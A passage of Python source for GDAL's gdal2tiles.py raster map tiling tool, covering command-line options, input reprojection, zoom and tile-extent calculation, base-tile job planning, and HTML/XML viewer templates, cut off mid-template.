help="The spatial reference system used for the source input data")
p.add_option("-z", "--zoom", dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option("-e", "--resume", dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option("-a", "--srcnodata", dest="srcnodata", metavar="NODATA",
help="NODATA transparency value to assign to the input data")
p.add_option("-d", "--tmscompatible", dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option("-x", "--xyz",
action='store_true', dest='xyz',
help="Use XYZ tile numbering instead of TMS")
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
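# A typical invocation might look like the following (the input and output
# paths are placeholders):
#   gdal2tiles.py -p mercator -z 2-5 -w openlayers --processes=2 input.tif tiles/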
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if (len(args) == 0):
exit_with_error("You need to specify at least an input file as argument to the script")
if (len(args) > 2):
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
output_folder = os.path.basename(input_file)
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'average':
try:
if gdal.RegenerateOverview:
pass
except Exception:
exit_with_error("'average' resampling algorithm is not available.",
"Please use -r 'near' argument or upgrade to newer version of GDAL.")
elif options.resampling == 'antialias':
try:
if numpy: # pylint:disable=W0125
pass
except Exception:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
# Tile format
self.tilesize = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp()
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big should the query window be for scaling down
# Reset later on according to the chosen resampling algorithm
self.querysize = 4 * self.tilesize
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tilesize
elif self.options.resampling == 'bilinear':
self.querysize = self.tilesize * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?",
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile in ('mercator', 'geodetic'):
if not in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs ESPG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator()
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tilesize))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level
# (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tilesize))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize/float(self.tilesize))),
math.ceil(log2(self.warped_input_dataset.RasterYSize/float(self.tilesize)))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz+1))
self.tsize = list(range(0, self.tmaxz+1))
for tz in range(0, self.tmaxz+1):
tsize = 2.0**(self.nativezoom-tz)*self.tilesize
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz-z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x*self.tilesize*pixelsizex
east = west + self.tilesize*pixelsizex
south = self.ominy + y*self.tilesize*pixelsizex
north = south + self.tilesize*pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax+1):
for y in range(ymin, ymax+1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tilesize, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy-1, -1):
for tx in range(tminx, tmaxx+1):
ti += 1
ytile = GDAL2Tiles.getYtile(ty, tz, self.options)
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ytile, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# Don't upscale with nearest neighbour; instead lower the querysize to the
# native resolution (and return a smaller query tile), so scaling happens later
if self.options.profile in ('mercator', 'geodetic'):
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
if tz >= self.nativezoom:
querysize = self.tilesize
rx = (tx) * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
ry = ysize - (ty * tsize) - rysize
wx, wy = 0, 0
wxsize = int(rxsize/float(tsize) * self.tilesize)
wysize = int(rysize/float(tsize) * self.tilesize)
if wysize != self.tilesize:
wy = self.tilesize - wysize
# Queue the tile for rendering; the source raster is read later (in
# create_base_tile) according to the computed geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ytile, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tilesize,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
)
return conf, tile_details
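# Design note (based on the code below): generate_base_tiles() itself reads no
# pixels; it only builds TileDetail records plus a TileJobInfo describing the
# job. The actual raster reads/writes happen later in create_base_tile(),
# driven either sequentially (single_threaded_tiling) or by a process pool
# (multi_threaded_tiling).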
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds.
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx+rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry+rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
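# Worked example (hypothetical dataset): a 100 x 100 px raster with
# geotransform (0, 10, 0, 1000, 0, -10) has its origin at (0, 1000) and 10 m
# pixels, covering x in [0, 1000] and y in [0, 1000]. A query with ulx=100,
# uly=900, lrx=300, lry=700 and querysize=256 returns
# (rx, ry, rxsize, rysize) = (10, 10, 20, 20) and
# (wx, wy, wxsize, wysize) = (0, 0, 256, 256): read a 20x20 px window and let
# the caller stretch it into a 256x256 query buffer. Queries reaching past the
# raster edges get rx/ry clamped and wx/wy shifted proportionally, which is how
# border tiles end up only partially filled.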
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tilesize, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tilesize)d" height="%(tilesize)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz+1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom-z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339/2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125/2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
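# Note on the units-per-pixel constants above: 156543.0339 is the Web Mercator
# ground resolution at zoom 0 for 256 px tiles (2*pi*6378137/256 metres per
# pixel) and 0.703125 is its geodetic counterpart (180/256 degrees per pixel);
# both halve at every zoom level, hence the division by 2**z.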
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
